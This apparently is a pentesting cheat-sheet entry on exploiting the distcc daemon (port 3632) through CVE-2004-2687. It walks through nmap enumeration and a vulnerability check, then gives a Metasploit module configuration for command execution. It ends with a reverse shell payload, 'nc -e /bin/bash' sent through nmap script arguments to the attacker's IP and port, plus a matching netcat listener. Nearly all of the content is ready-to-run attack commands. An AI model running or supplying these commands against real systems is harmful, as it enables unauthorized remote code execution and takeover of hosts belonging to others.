Distcc - Port 3632

Basic info

Distcc (Distributed Compiler) is a tool designed to speed up code compilation by distributing the workload to multiple machines over a network.

If a system is running the distccd daemon and is misconfigured (especially without authentication), it may allow an attacker to execute arbitrary commands remotely — a vulnerability famously tracked as CVE-2004-2687.

Key Details

• Default Port: 3632/tcp

• Service Name: distccd

• Purpose: Distribute compilation tasks across multiple computers.

• Risk: Remote Code Execution (RCE) if misconfigured.

Enumeration

1. Port Discovery

First, check if the service is open:

nmap -p 3632 <target>

PORT     STATE SERVICE
3632/tcp open  distccd

2. Service Fingerprinting

Confirm it’s actually Distcc:

nmap -sV -p 3632 <target>

3. Nmap CVE Check

Nmap has a script for CVE-2004-2687:

nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

If the host is vulnerable, you should see the output of the id command in the scan results.

Exploitation

1. Metasploit

Metasploit provides a dedicated module:

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target>
set RPORT 3632
set CMD id
run

You can replace id with any command to execute remotely.

2. Manual Exploitation (Without Metasploit)

Distcc can execute shell commands by sending specially crafted requests. A quick PoC can be found here: 🔗 DarkCoderSc Gist

Example: Reverse Shell Payload

nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='nc -e /bin/bash <your_ip> <your_port>'"

On your attacking machine:

nc -lvnp <your_port>